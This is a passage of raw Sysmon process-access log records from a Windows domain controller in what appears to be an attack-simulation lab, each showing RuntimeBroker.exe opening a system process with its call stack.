indows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011272Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011271Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011270Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011263Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011262Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011261Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011260Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011259Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011258Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 